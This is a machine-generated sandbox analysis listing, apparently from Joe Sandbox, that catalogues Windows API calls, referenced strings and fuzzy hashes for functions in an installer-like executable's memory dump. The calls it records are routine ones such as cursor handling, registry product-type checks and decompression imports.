                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Message$TextWindow$A25940CurrentDispatchSendThreadTranslate
                                                              • String ID: [Paused]
                                                              • API String ID: 3047529653-4230553315
                                                              • Opcode ID: a723b0617cbdde8b0455b730e79db8c0792bcf361dff27c4d69091156c9f8888
                                                              • Instruction ID: cc82e29175726c0716c689c1ffa83d11e9869aeff1ced20ba9c80888b84e3111
                                                              • Opcode Fuzzy Hash: a723b0617cbdde8b0455b730e79db8c0792bcf361dff27c4d69091156c9f8888
                                                              • Instruction Fuzzy Hash: 013196309082489EDB11DBB5EC81FDEBBB8DB49314F5540B7F800E7292D67C9909CB69
                                                              APIs
                                                              • GetCursor.USER32(00000000,0046B897), ref: 0046B814
                                                              • LoadCursorA.USER32(00000000,00007F02), ref: 0046B822
                                                              • SetCursor.USER32(00000000,00000000,00007F02,00000000,0046B897), ref: 0046B828
                                                              • Sleep.KERNEL32(000002EE,00000000,00000000,00007F02,00000000,0046B897), ref: 0046B832
                                                              • SetCursor.USER32(00000000,000002EE,00000000,00000000,00007F02,00000000,0046B897), ref: 0046B838
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Cursor$LoadSleep
                                                              • String ID: CheckPassword
                                                              • API String ID: 4023313301-1302249611
                                                              • Opcode ID: 653d9654f76fc9f2c348947714f395caa5fd1a5bea1654e8e7fe328d35dfe1b3
                                                              • Instruction ID: aec6a0205c5a75bc54f0fc291e1a1f9730d999611bc1887dd1e74dc6007ab6bd
                                                              • Opcode Fuzzy Hash: 653d9654f76fc9f2c348947714f395caa5fd1a5bea1654e8e7fe328d35dfe1b3
                                                              • Instruction Fuzzy Hash: 333164346406049FD711EB69C889F9E7BE4EF49304F5580B6F844DB3A2D778AD40CB99
                                                              APIs
                                                                • Part of subcall function 00477AB0: GetWindowThreadProcessId.USER32(00000000), ref: 00477AB8
                                                                • Part of subcall function 00477AB0: GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477BAF,0049C0A4,00000000), ref: 00477ACB
                                                                • Part of subcall function 00477AB0: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477AD1
                                                              • SendMessageA.USER32(00000000,0000004A,00000000,00477F42), ref: 00477BBD
                                                              • GetTickCount.KERNEL32 ref: 00477C02
                                                              • GetTickCount.KERNEL32 ref: 00477C0C
                                                              • MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,0000000A,000000FF), ref: 00477C61
                                                              Strings
                                                              • CallSpawnServer: Unexpected response: $%x, xrefs: 00477BF2
                                                              • CallSpawnServer: Unexpected status: %d, xrefs: 00477C4A
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: CountTick$AddressHandleMessageModuleMultipleObjectsProcProcessSendThreadWaitWindow
                                                              • String ID: CallSpawnServer: Unexpected response: $%x$CallSpawnServer: Unexpected status: %d
                                                              • API String ID: 613034392-3771334282
                                                              • Opcode ID: 56bd6ace22e6e2035f5031cc9978de37ae905e15686cac3f17074c750df7538a
                                                              • Instruction ID: 65d184c56696bd8d6baefe4a5ac293f093c2dd543b1706e930bc299cdf77f89e
                                                              • Opcode Fuzzy Hash: 56bd6ace22e6e2035f5031cc9978de37ae905e15686cac3f17074c750df7538a
                                                              • Instruction Fuzzy Hash: B131A474B042149ADB11EBB988867EEB6A09F48304F90C47AF548EB392D67C9E41879D
                                                              APIs
                                                              • GetProcAddress.KERNEL32(626D6573,CreateAssemblyCache), ref: 00459BA3
                                                              Strings
                                                              • Fusion.dll, xrefs: 00459B43
                                                              • CreateAssemblyCache, xrefs: 00459B9A
                                                              • Failed to get address of .NET Framework CreateAssemblyCache function, xrefs: 00459BAE
                                                              • Failed to load .NET Framework DLL "%s", xrefs: 00459B88
                                                              • .NET Framework CreateAssemblyCache function failed, xrefs: 00459BC6
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: AddressProc
                                                              • String ID: .NET Framework CreateAssemblyCache function failed$CreateAssemblyCache$Failed to get address of .NET Framework CreateAssemblyCache function$Failed to load .NET Framework DLL "%s"$Fusion.dll
                                                              • API String ID: 190572456-3990135632
                                                              • Opcode ID: edece01ff0b44ec29f5677049ed357158d3b305d3ba0728d372a41e2f192b5a4
                                                              • Instruction ID: 1db31b6b51e2e068c3f61674d824012408e1fbc1d182cf764eafebb5ab4ea00f
                                                              • Opcode Fuzzy Hash: edece01ff0b44ec29f5677049ed357158d3b305d3ba0728d372a41e2f192b5a4
                                                              • Instruction Fuzzy Hash: EF318970E00619EBDB01EFA5C88169EB7B8AF44315F50857BE814E7382D738AE09C799
                                                              APIs
                                                                • Part of subcall function 0041C058: GetObjectA.GDI32(?,00000018), ref: 0041C065
                                                              • GetFocus.USER32 ref: 0041C178
                                                              • 73A1A570.USER32(?), ref: 0041C184
                                                              • 73A18830.GDI32(?,?,00000000,00000000,0041C203,?,?), ref: 0041C1A5
                                                              • 73A122A0.GDI32(?,?,?,00000000,00000000,0041C203,?,?), ref: 0041C1B1
                                                              • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041C1C8
                                                              • 73A18830.GDI32(?,00000000,00000000,0041C20A,?,?), ref: 0041C1F0
                                                              • 73A1A480.USER32(?,?,0041C20A,?,?), ref: 0041C1FD
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: A18830$A122A480A570BitsFocusObject
                                                              • String ID:
                                                              • API String ID: 2231653193-0
                                                              • Opcode ID: 32c019c2b17a625013bd7d07803e420f9d7b692fe3dc5f877fb11705181084ab
                                                              • Instruction ID: a51b9c7cee13939b32e911f1849152ebfa7eb0d73570b73294f05c7218cf190f
                                                              • Opcode Fuzzy Hash: 32c019c2b17a625013bd7d07803e420f9d7b692fe3dc5f877fb11705181084ab
                                                              • Instruction Fuzzy Hash: A0116A71E40609BBDB10DBE9CC85FAFBBFCEF48700F54446AB518E7281D67899008B28
                                                              APIs
                                                              • GetSystemMetrics.USER32(0000000E), ref: 00418C80
                                                              • GetSystemMetrics.USER32(0000000D), ref: 00418C88
                                                              • 6F532980.COMCTL32(00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418C8E
                                                                • Part of subcall function 004099C0: 6F52C400.COMCTL32(0049B628,000000FF,00000000,00418CBC,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 004099C4
                                                              • 6F59CB00.COMCTL32(0049B628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418CDE
                                                              • 6F59C740.COMCTL32(00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001), ref: 00418CE9
                                                              • 6F59CB00.COMCTL32(0049B628,00000001,?,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000), ref: 00418CFC
                                                              • 6F530860.COMCTL32(0049B628,00418D1F,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E), ref: 00418D12
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: MetricsSystem$C400C740F530860F532980
                                                              • String ID:
                                                              • API String ID: 209721339-0
                                                              • Opcode ID: 33c04b7a68779a44c69ffbd8ad79940853ad3b201d45ee57610259a2e4dbeb77
                                                              • Instruction ID: e0b43fe86d74620756cf035266125a11838772e9d6ef4bcae2e69295d5b8951d
                                                              • Opcode Fuzzy Hash: 33c04b7a68779a44c69ffbd8ad79940853ad3b201d45ee57610259a2e4dbeb77
                                                              • Instruction Fuzzy Hash: A11149B1744204BBEB10EBA9DC83F5E73B8DB48704F6044BAB604E72D2DB799D409759
                                                              APIs
                                                                • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                              • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,004837A4), ref: 00483789
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: CloseOpen
                                                              • String ID: LanmanNT$ProductType$ServerNT$System\CurrentControlSet\Control\ProductOptions$WinNT
                                                              • API String ID: 47109696-2530820420
                                                              • Opcode ID: ae1742725748cd88b87d9fe0d1248e5a5e1a514a3c9083b9a236ca5d7aa17843
                                                              • Instruction ID: 8316402a246994b7737153b66ed252a9f16b12b2be78e08e0fa98e077eb8f510
                                                              • Opcode Fuzzy Hash: ae1742725748cd88b87d9fe0d1248e5a5e1a514a3c9083b9a236ca5d7aa17843
                                                              • Instruction Fuzzy Hash: 0311B1B4704244AADB10FF65CC52B5E7AE9DB41B19F60C87BA400A7282EB38CA05875C
                                                              APIs
                                                              • 73A1A570.USER32(00000000,?,?,00000000), ref: 00494EE9
                                                                • Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7
                                                              • SelectObject.GDI32(00000000,00000000), ref: 00494F0B
                                                              • GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,00495489), ref: 00494F1F
                                                              • GetTextMetricsA.GDI32(00000000,?), ref: 00494F41
                                                              • 73A1A480.USER32(00000000,00000000,00494F6B,00494F64,?,00000000,?,?,00000000), ref: 00494F5E
                                                              Strings
                                                              • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 00494F16
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Text$A480A570CreateExtentFontIndirectMetricsObjectPointSelect
                                                              • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                                                              • API String ID: 1435929781-222967699
                                                              • Opcode ID: f7d6f97b91dc48adac3cf3527b9ba73e93ee7bba49e4f60ed72cccac08d23d6d
                                                              • Instruction ID: 6f18d4fe6cef93123b0455e30b82395b7dbfc0c8f911bccc88a8e51c4d6277b1
                                                              • Opcode Fuzzy Hash: f7d6f97b91dc48adac3cf3527b9ba73e93ee7bba49e4f60ed72cccac08d23d6d
                                                              • Instruction Fuzzy Hash: 95018476A04609BFEB00DBA9CC41F5EB7ECDB89704F51447AB600E7281D678AE018B28
                                                              APIs
                                                              • SelectObject.GDI32(00000000,?), ref: 0041B480
                                                              • SelectObject.GDI32(?,00000000), ref: 0041B48F
                                                              • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4BB
                                                              • SelectObject.GDI32(00000000,00000000), ref: 0041B4C9
                                                              • SelectObject.GDI32(?,00000000), ref: 0041B4D7
                                                              • DeleteDC.GDI32(00000000), ref: 0041B4E0
                                                              • DeleteDC.GDI32(?), ref: 0041B4E9
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: ObjectSelect$Delete$Stretch
                                                              • String ID:
                                                              • API String ID: 1458357782-0
                                                              • Opcode ID: 72b6a28bf9d60e237e3396a0a8e2fc7d77968e10b7c0149e345d15a7b5d8e936
                                                              • Instruction ID: 28529174ed8a1a36c66279ad8c479dcd7ed434ba0fbaa502c63cdd0cc078bbc5
                                                              • Opcode Fuzzy Hash: 72b6a28bf9d60e237e3396a0a8e2fc7d77968e10b7c0149e345d15a7b5d8e936
                                                              • Instruction Fuzzy Hash: A1114C72E40559ABDF10D6D9D885FAFB3BCEF08704F048456B614FB241C678A8418B54
                                                              APIs
                                                              • GetCursorPos.USER32 ref: 004233BF
                                                              • WindowFromPoint.USER32(?,?), ref: 004233CC
                                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004233DA
                                                              • GetCurrentThreadId.KERNEL32 ref: 004233E1
                                                              • SendMessageA.USER32(00000000,00000084,?,?), ref: 004233FA
                                                              • SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00423411
                                                              • SetCursor.USER32(00000000), ref: 00423423
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                              • String ID:
                                                              • API String ID: 1770779139-0
                                                              • Opcode ID: 5751e80311b49702528c8fc5ff8f7f3a6fa30eb8cde205135d5a5ff58115ab5c
                                                              • Instruction ID: 219e0d69ac6b6a38dcb61baa39fbc914f783b163521ae56cddb293ea60412e1c
                                                              • Opcode Fuzzy Hash: 5751e80311b49702528c8fc5ff8f7f3a6fa30eb8cde205135d5a5ff58115ab5c
                                                              • Instruction Fuzzy Hash: E601D42230472036D6217B795C86E2F26A8CFC5B15F50457FB649BB283DA3D8C0063BD
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(user32.dll), ref: 00494D0C
                                                              • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 00494D19
                                                              • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00494D26
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$HandleModule
                                                              • String ID: GetMonitorInfoA$MonitorFromRect$user32.dll
                                                              • API String ID: 667068680-2254406584
                                                              • Opcode ID: 70207861a9ddbbfcf1ec4c2ebf1ed82301f215222d5c3051e71e037128298d5d
                                                              • Instruction ID: 42226921e916c2e61715a17367c32eae2b2292ab525ca03b869d6a68ec0a34c4
                                                              • Opcode Fuzzy Hash: 70207861a9ddbbfcf1ec4c2ebf1ed82301f215222d5c3051e71e037128298d5d
                                                              • Instruction Fuzzy Hash: 6CF0F69AB41B1466DA2025B68C81F7B698CCFD1B71F050337BE04A7382ED9D8D0642AD
                                                              APIs
                                                              • GetProcAddress.KERNEL32(030E0000,BZ2_bzDecompressInit), ref: 0045D9F5
                                                              • GetProcAddress.KERNEL32(030E0000,BZ2_bzDecompress), ref: 0045DA05
                                                              • GetProcAddress.KERNEL32(030E0000,BZ2_bzDecompressEnd), ref: 0045DA15
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: AddressProc
                                                              • String ID: BZ2_bzDecompress$BZ2_bzDecompressEnd$BZ2_bzDecompressInit
                                                              • API String ID: 190572456-212574377
                                                              • Opcode ID: 01040e06415ef817a4763b016626a28be3372e477bb5bd5db3809bf0997a53ea
                                                              • Instruction ID: e47ea2fb967bc5a05fa6d8d3c64fcba096cc564050e4d812c51f788cc71ed1ca
                                                              • Opcode Fuzzy Hash: 01040e06415ef817a4763b016626a28be3372e477bb5bd5db3809bf0997a53ea
                                                              • Instruction Fuzzy Hash: 2BF030B0D05300DFEB24DFB29CC372336959BA4316F14803B9A0D96267D278088CCE2C
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,00000004,00499934,00457029,004573CC,00456F80,00000000,00000B06,00000000,00000000,00000001,00000000,00000002,00000000,00480D8E), ref: 0042EA45
                                                              • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EA4B
                                                              • InterlockedExchange.KERNEL32(0049B668,00000001), ref: 0042EA5C
                                                                • Part of subcall function 0042E9BC: GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA80,00000004,00499934,00457029,004573CC,00456F80,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9D2
                                                                • Part of subcall function 0042E9BC: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9D8
                                                                • Part of subcall function 0042E9BC: InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9E9
                                                              • ChangeWindowMessageFilterEx.USER32(00000000,?,00000001,00000000,00000004,00499934,00457029,004573CC,00456F80,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042EA70
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: AddressExchangeHandleInterlockedModuleProc$ChangeFilterMessageWindow
                                                              • String ID: ChangeWindowMessageFilterEx$user32.dll
                                                              • API String ID: 142928637-2676053874
                                                              • Opcode ID: d06cc84e9d2e4e0b448c748badd712702b96776d6b0267aa2fd44745f5a2b4d6
                                                              • Instruction ID: 2c8c4e1fda890c3dedf4e0e73620de090a3a9d5666271f16a874a7bcdd66483b
                                                              • Opcode Fuzzy Hash: d06cc84e9d2e4e0b448c748badd712702b96776d6b0267aa2fd44745f5a2b4d6
                                                              • Instruction Fuzzy Hash: 52E092A1741720EAEA10B7B67CC6F9A2668E714729F54403BF100A51E1C3BD1C80CE9E
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(oleacc.dll,?,0044F099), ref: 0044C7FB
                                                              • GetProcAddress.KERNEL32(00000000,LresultFromObject), ref: 0044C80C
                                                              • GetProcAddress.KERNEL32(00000000,CreateStdAccessibleObject), ref: 0044C81C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$LibraryLoad
                                                              • String ID: CreateStdAccessibleObject$LresultFromObject$oleacc.dll
                                                              • API String ID: 2238633743-1050967733
                                                              • Opcode ID: c58342e6ebd42d3e550f5fa79659fa064c9032f03f8e913941057cc824ddc2bd
                                                              • Instruction ID: d5a6e329c062b47ae4ba9e11e7719f1ec1b45dd3e70fac445fdcae0b1af11dcb
                                                              • Opcode Fuzzy Hash: c58342e6ebd42d3e550f5fa79659fa064c9032f03f8e913941057cc824ddc2bd
                                                              • Instruction Fuzzy Hash: 64F0FE70246305CAFB50BBB5FDC67223694E3A4B0AF18137BE40156192D7BC4444CF4C
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,?,004985F4), ref: 00478B42
                                                              • GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00478B4F
                                                              • GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00478B5F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
